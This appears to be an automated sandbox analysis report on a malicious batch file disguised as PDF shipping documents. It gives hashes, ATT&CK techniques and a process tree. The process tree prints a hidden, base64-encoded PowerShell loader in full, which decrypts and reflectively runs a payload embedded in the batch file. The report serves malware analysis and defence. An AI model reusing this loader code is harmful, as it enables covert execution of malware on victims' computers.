feada76fd75410d24b52dd6b9dede5ad0d1357f69b1c94d29645205793630dd8

General

Target

Original_BL_Shipping_Documents.pdf_.bat
Size

64KB
MD5

c784b6876259c872711eaf78807e5756
SHA1

ef62eccd9a17ade1eaa1b9f17965809e61e1dc06
SHA256

1bccd23f3c83974f8fb8066bf4ceb6b2faa165af846401080bf2cdccd1ef79da
SHA512

4a81baecf18a5c02a1a8058615ddda804c9c52e38853392530207d3c823e1c8cca55ee4976056abce72f06cf4b433c2ed18522e805e536a8aab1a4693c54f26f
SSDEEP

1536:6im/0y4lWcfZP+UtLdxgNp2VnVCiJZkbmEKUgXEXzICKUnFN:6NszDfZ2UCGnVCiIHfj

Score

8^/10

discovery execution

Malware Config

Signatures

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
2844	powershell.exe

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

pid	Process
328	cmd.exe
2384	cmd.exe

Suspicious behavior: EnumeratesProcesses 1 IoCs

pid	Process
2844	powershell.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	2844	powershell.exe

Suspicious use of WriteProcessMemory 6 IoCs

description	pid	Process	procid_target
PID 328 wrote to memory of 2384	328	cmd.exe	32
PID 328 wrote to memory of 2384	328	cmd.exe	32
PID 328 wrote to memory of 2384	328	cmd.exe	32
PID 2384 wrote to memory of 2844	2384	cmd.exe	34
PID 2384 wrote to memory of 2844	2384	cmd.exe	34
PID 2384 wrote to memory of 2844	2384	cmd.exe	34

C:\Windows\system32\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\Original_BL_Shipping_Documents.pdf_.bat"
1⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Suspicious use of WriteProcessMemory
PID:328
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\Original_BL_Shipping_Documents.pdf_.bat"
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  - Suspicious use of WriteProcessMemory
  PID:2384
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('JHVzZXJOYW1lID0gJGVudjpVU0VSTkFNRTskbmV1Y3IgPSAiQzpcVXNlcnNcJHVzZXJOYW1lXGR3bS5iYXQiO2lmIChUZXN0LVBhdGggJG5ldWNyKSB7ICAgIFdyaXRlLUhvc3QgIkJhdGNoIGZpbGUgZm91bmQ6ICRuZXVjciIgLUZvcmVncm91bmRDb2xvciBDeWFuOyAgICAkZmlsZUxpbmVzID0gW1N5c3RlbS5JTy5GaWxlXTo6UmVhZEFsbExpbmVzKCRuZXVjciwgW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOCk7ICAgIGZvcmVhY2ggKCRsaW5lIGluICRmaWxlTGluZXMpIHsgICAgICAgIGlmICgkbGluZSAtbWF0Y2ggJ146OjogPyguKykkJykgeyAgICAgICAgICAgIFdyaXRlLUhvc3QgIkluamVjdGlvbiBjb2RlIGRldGVjdGVkIGluIHRoZSBiYXRjaCBmaWxlLiIgLUZvcmVncm91bmRDb2xvciBDeWFuOyAgICAgICAgICAgIHRyeSB7ICAgICAgICAgICAgICAgICRkZWNvZGVkQnl0ZXMgPSBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKCRtYXRjaGVzWzFdLlRyaW0oKSk7ICAgICAgICAgICAgICAgICRpbmplY3Rpb25Db2RlID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VW5pY29kZS5HZXRTdHJpbmcoJGRlY29kZWRCeXRlcyk7ICAgICAgICAgICAgICAgIFdyaXRlLUhvc3QgIkluamVjdGlvbiBjb2RlIGRlY29kZWQgc3VjY2Vzc2Z1bGx5LiIgLUZvcmVncm91bmRDb2xvciBHcmVlbjsgICAgICAgICAgICAgICAgV3JpdGUtSG9zdCAiRXhlY3V0aW5nIGluamVjdGlvbiBjb2RlLi4uIiAtRm9yZWdyb3VuZENvbG9yIFllbGxvdzsgICAgICAgICAgICAgICAgSW52b2tlLUV4cHJlc3Npb24gJGluamVjdGlvbkNvZGU7ICAgICAgICAgICAgICAgIGJyZWFrOyAgICAgICAgICAgIH0gY2F0Y2ggeyAgICAgICAgICAgICAgICBXcml0ZS1Ib3N0ICJFcnJvciBkdXJpbmcgZGVjb2Rpbmcgb3IgZXhlY3V0aW5nIGluamVjdGlvbiBjb2RlOiAkXyIgLUZvcmVncm91bmRDb2xvciBSZWQ7ICAgICAgICAgICAgfTsgICAgICAgIH07ICAgIH07fSBlbHNlIHsgICAgICBXcml0ZS1Ib3N0ICJTeXN0ZW0gRXJyb3I6IEJhdGNoIGZpbGUgbm90IGZvdW5kOiAkbmV1Y3IiIC1Gb3JlZ3JvdW5kQ29sb3IgUmVkOyAgICBleGl0O307ZnVuY3Rpb24gaWpjY3ooJHBhcmFtX3Zhcil7CSRhZXNfdmFyPVtTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5LkFlc106OkNyZWF0ZSgpOwkkYWVzX3Zhci5Nb2RlPVtTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5LkNpcGhlck1vZGVdOjpDQkM7CSRhZXNfdmFyLlBhZGRpbmc9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuUGFkZGluZ01vZGVdOjpQS0NTNzsJJGFlc192YXIuS2V5PVtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJ2Mxb2MycjZCQXNYS2JWNmN4ZWw3eDcyckwrYm5sSERwaXlKYVpudUFsTXM9Jyk7CSRhZXNfdmFyLklWPVtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJ0NVdzJER2lTem5TejVJK29TVDFFVGc9PScpOwkkZGVjcnlwdG9yX3Zhcj0kYWVzX3Zhci5DcmVhdGVEZWNyeXB0b3IoKTsJJHJldHVybl92YXI9JGRlY3J5cHRvcl92YXIuVHJhbnNmb3JtRmluYWxCbG9jaygkcGFyYW1fdmFyLCAwLCAkcGFyYW1fdmFyLkxlbmd0aCk7CSRkZWNyeXB0b3JfdmFyLkRpc3Bvc2UoKTsJJGFlc192YXIuRGlzcG9zZSgpOwkkcmV0dXJuX3Zhcjt9ZnVuY3Rpb24gcGZ5eXooJHBhcmFtX3Zhcil7CSRieW5qbz1OZXctT2JqZWN0IFN5c3RlbS5JTy5NZW1vcnlTdHJlYW0oLCRwYXJhbV92YXIpOwkkdmpyY289TmV3LU9iamVjdCBTeXN0ZW0uSU8uTWVtb3J5U3RyZWFtOwkkeHNnbnk9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQ29tcHJlc3Npb24uR1ppcFN0cmVhbSgkYnluam8sIFtJTy5Db21wcmVzc2lvbi5Db21wcmVzc2lvbk1vZGVdOjpEZWNvbXByZXNzKTsJJHhzZ255LkNvcHlUbygkdmpyY28pOwkkeHNnbnkuRGlzcG9zZSgpOwkkYnluam8uRGlzcG9zZSgpOwkkdmpyY28uRGlzcG9zZSgpOwkkdmpyY28uVG9BcnJheSgpO31mdW5jdGlvbiB6bmJpaCgkcGFyYW1fdmFyLCRwYXJhbTJfdmFyKXsJJHh0Y3duPVtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV06OignZGFvTCdbLTEuLi00XSAtam9pbiAnJykoW2J5dGVbXV0kcGFyYW1fdmFyKTsJJGFibWh6PSR4dGN3bi5FbnRyeVBvaW50OwkkYWJtaHouSW52b2tlKCRudWxsLCAkcGFyYW0yX3Zhcik7fSRob3N0LlVJLlJhd1VJLldpbmRvd1RpdGxlID0gJG5ldWNyOyRhbGpnYz1bU3lzdGVtLklPLkZpbGVdOjooJ3R4ZVRsbEFkYWVSJ1stMS4uLTExXSAtam9pbiAnJykoJG5ldWNyKS5TcGxpdChbRW52aXJvbm1lbnRdOjpOZXdMaW5lKTtmb3JlYWNoICgkeHVuIGluICRhbGpnYykgewlpZiAoJHh1bi5TdGFydHNXaXRoKCc6OiAnKSkJewkJJGpsdm16PSR4dW4uU3Vic3RyaW5nKDMpOwkJYnJlYWs7CX19JGxwenB6PVtzdHJpbmdbXV0kamx2bXouU3BsaXQoJ1wnKTskbHpuY3g9cGZ5eXogKGlqY2N6IChbQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJGxwenB6WzBdKSkpOyR4b2Z1eT1wZnl5eiAoaWpjY3ogKFtDb252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygkbHB6cHpbMV0pKSk7em5iaWggJGx6bmN4ICRudWxsO3puYmloICR4b2Z1eSAoLFtzdHJpbmdbXV0gKCclKicpKTs=')) | Invoke-Expression"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2844

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Network Configuration Discovery

1

T1016

Internet Connection Discovery

1

T1016.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/2844-6-0x000007FEF589E000-0x000007FEF589F000-memory.dmp

Filesize
4KB

Download
memory/2844-7-0x000000001B6D0000-0x000000001B9B2000-memory.dmp

Filesize
2.9MB

Download
memory/2844-8-0x0000000001FF0000-0x0000000001FF8000-memory.dmp

Filesize
32KB

Download
memory/2844-9-0x000007FEF55E0000-0x000007FEF5F7D000-memory.dmp

Filesize
9.6MB

Download
memory/2844-10-0x000007FEF55E0000-0x000007FEF5F7D000-memory.dmp

Filesize
9.6MB

Download
memory/2844-13-0x000007FEF55E0000-0x000007FEF5F7D000-memory.dmp

Filesize
9.6MB

Download
memory/2844-12-0x000007FEF55E0000-0x000007FEF5F7D000-memory.dmp

Filesize
9.6MB

Download
memory/2844-11-0x000007FEF55E0000-0x000007FEF5F7D000-memory.dmp

Filesize
9.6MB

Download
memory/2844-14-0x000007FEF55E0000-0x000007FEF5F7D000-memory.dmp

Filesize
9.6MB

Download

Analysis

Sharing